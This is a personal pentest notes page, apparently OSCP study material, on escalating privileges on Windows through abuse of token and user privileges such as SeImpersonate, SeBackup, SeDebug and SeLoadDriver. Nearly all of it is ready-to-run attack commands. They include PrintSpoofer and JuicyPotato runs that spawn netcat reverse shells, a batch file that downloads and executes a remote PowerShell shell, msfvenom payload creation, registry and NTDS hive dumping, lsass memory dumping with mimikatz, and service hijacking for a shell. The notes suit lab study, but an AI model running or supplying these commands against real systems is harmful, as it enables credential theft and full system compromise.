M4RCG04M
  • 👨‍💻Welcome to my GitBook
  • WRITEUPS
    • HackTheBox
      • Windows
        • Remote
      • Linux
        • Jarvis
        • Tabby
    • Proving Grounds Play
      • BBScute
      • FunBoxEasyEnum
      • Monitoring
      • Loly
      • Pelican
      • Payday
      • Snookums
  • OSCP Preparation List
    • Hack The Box
    • Proving Grounds
  • NOTES
    • UTILS
      • Useful Files
      • Payloads
      • Lateral Movement
    • ENUMERATION
      • Port 79 (finger)
      • Port 80 (HTTP)
      • Port 111 (RPCBIND)
      • PORT 161/udp (SNMP)
      • PORT 389,636,3268,3269 (LDAP)
      • Port 6697 (IRCD)
      • Database Analysis
      • Grafana
    • FILE TRANSFERS
    • ACTIVE DIRECTORY
      • Known Vulnerabilities
      • Without Credentials
        • Classic Attacks
      • With Username
      • Valid Credentials
      • Lateral Move
      • ACLs/ACEs permissions
      • Active Directory Certificate Services (AD CS)
      • Administrator account
      • Domain Admin
    • EXPLOTATION
      • Port 53 (DNS)
      • Port 80 (HTTP)
        • CMS
        • SQL INJECTION
        • XXE
        • File Upload
        • Cross Site Scripting (XSS)
      • Port 3389 (RDP)
      • Password Attacks
        • Hash Cracking
    • PRIVILEGE ESCALATION
      • Windows
        • Enumeration
        • Windows User Privileges
        • Windows Group Privileges
        • Weak Permissions
        • Windows Vulnerabilities
        • Credential Hunting
        • Tools
      • Linux
        • Enumeration
Powered by GitBook
On this page
  • SeImpersonate
  • Incognito (Metasploit)
  • PrintSpoofer (Only works on Windows 10 and Server 2019)
  • Juicy Potato
  • SeBackup and SeRestore Privilege
  • SeBackupPrivilege Privilege Escalation (diskshadow)
  • SeDebugPrivilege
  • SeTakeOwnership
  • SeLoadDriverPrivilege
  • Enable a Privilege
  1. NOTES
  2. PRIVILEGE ESCALATION
  3. Windows

Windows User Privileges

PreviousEnumerationNextWindows Group Privileges

Last updated 22 hours ago

SeImpersonate

These privileges are required for an attack:

  • SeAssignPrimaryToken: Allows a process to assign the primary token for a process. This privilege is critical for creating processes with specific user security contexts.

  • SeCreateToken: The SeCreateToken privilege allows a process to create new security tokens, typically used for authentication and identity representation.

  • SeImpersonatePrivilege: The SeImpersonatePrivilege allows a process to impersonate other users' security tokens. This privilege is crucial for operations.

Incognito (Metasploit)

With a meterpreter shell and once we confirmed that we have these privileges, we can load incognito:

load incognito

To list the tokens:

list_tokens -u

For impersonating a token:

impersonate_token "name"

For upgrading the privileges in meterpreter shell we have to migrate to other pid:

pgrep explorer
migrate id

PrintSpoofer (Only works on Windows 10 and Server 2019)

We have to upload the nc.exe and PrintSpoofer.exe files to the victim machine:

(New-Object System.Net.WebClient).DownloadFile("http://<ip>/nc.exe", "C:\Temp\nc.exe")

(New-Object System.Net.WebClient).DownloadFile("http://<ip>/PrintSpoofer64.exe", "C:\Temp\PrintSpoofer64.exe")

Open a Listener

nc -nvlp 4444

Execute the exploit:

.\PrintSpoofer64.exe -c "C:\Temp\nc.exe 10.10.14.9 4444 -e cmd"

Juicy Potato

We have to copy the .exe file to the machine:

(New-Object System.Net.WebClient).DownloadFile("http://<ip>/JuicyPotato.exe", "C:\Temp\JuicyPotato.exe")

Powershell

We will upload a payload for our reverse shell. For this, we create a shell.bat file:

echo "powershell.exe -c iex(new-object net.webclient).downloadstring('http://<ip>:80/Invoke-PowerShellTcp.ps1')" > shell.bat

Finally upload the file to the machine:

(New-Object System.Net.WebClient).DownloadFile("http://<ip>/shell.bat", "C:\Temp\shell.bat")

CMD

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=5555-a x64 --platform Windows -f exe -o shell.exe

We have to get one depending of the OS version of the target system.

We have to start a Listener (the same port as our nishang shell)

nc -nlvp <port>

And finally execute the exploit:

Powershell

./JuicyPotato.exe -l <port> -p C:\temp\shell.bat -t * -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"

CMD

.\JuicyPotato.exe -l 443 -t * -p C:\Temp\shell.exe -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"
c:\tools\JuicyPotato.exe -l 12345 -p C:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe <ip> <port> -e cmd.exe" -t *

SeBackup and SeRestore Privilege

This privilege allows a user to read any file on the system, even those they would not normally have access to, by accessing files in "backup mode."

You can potentially exploit this by creating copies of sensitive files (like the SAM database, registry hives, or password-protected files) and then extracting credentials offline. For instance:

reg save HKLM\SECURITY security.hive
reg save HKLM\sam sam.hive
reg save HKLM\system system.hive

Dumping Hashes

impacket-secretsdump -sam sam.hive -system system.hive LOCAL

SeBackupPrivilege Privilege Escalation (diskshadow)

Script for PowerShell Environment

In our kali, create a file.dsh which is a Distributed Shell File.

SET CONTEXT PERSISTENT NOWRITERS
add volume c: alias foobar
create
expose %foobar% z:

Then use unix2dos to convert the encoding and spacing of the dsh file to a format that is compatible with the Windows machine, ensuring seamless execution.

unix2dos file.dsh

And upload the file to the machine

Transferring and Executing the DSH File

When it is uploaded run the file.

diskshadow /s file.dsh

Now, we can use the RoboCopy tool to copy the file from the Z Drive to the Temp Directory.

robocopy /b z:\windows\ntds . ntds.dit

## other method
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.ditExport System Registry Value
reg save HKLM\SYSTEM c:\temp\system

Finally send the system and ntds.dit file to our kali

Extract the Hashes

impacket-secretsdump -sam sam -system system -ntds ntds.dit LOCAL

SeDebugPrivilege

We can use ProcDump from the SysInternals suite to leverage this privilege and dump process memory.

procdump.exe -accepteula -ma lsass.exe lsass.dmp

This is successful, and we can load this in Mimikatz using the sekurlsa::minidump command.

mimkatz.exe
mimikatz # log
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords

RCE

We can also leverage SeDebugPrivilege for RCE.

Run the command tasklist and select the pid of a system process (for example winlogon.exe)

.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,"")

SeTakeOwnership

takeown /f '<file_path>'

For confirming the ownership we can run this command in powershell

Get-ChildItem -Path '<file_path>' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}

We may still not be able to read the file and need to modify the file ACL using icacls to be able to read it.

icacls '<file_path>' /grant <user>:F

Files of Interest

c:\inetpub\wwwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav

SeLoadDriverPrivilege

sc.exe query
$services=(get-service).name | foreach {(Get-ServiceAcl $_)  | where {$_.access.IdentityReference -match 'Server Operators'}}
sc.exe config VSS binpath="C:\temp\nc64.exe -e cmd <LHOST> <LPORT>"
sc.exe stop VSS
sc.exe start VSS

Enable a Privilege

Windows does not provide a built-in command or PowerShell cmdlet to enable privileges, so we need some scripting to help us out.

Wr have to choose a CLSID for testing, available .

First, transfer this over to the target system.

Find a intersting file and change the ownership for reading its content. We can use the Windows binary to change ownership of the file.

here
PoC script
takeown
Powershell Script to enable all privileges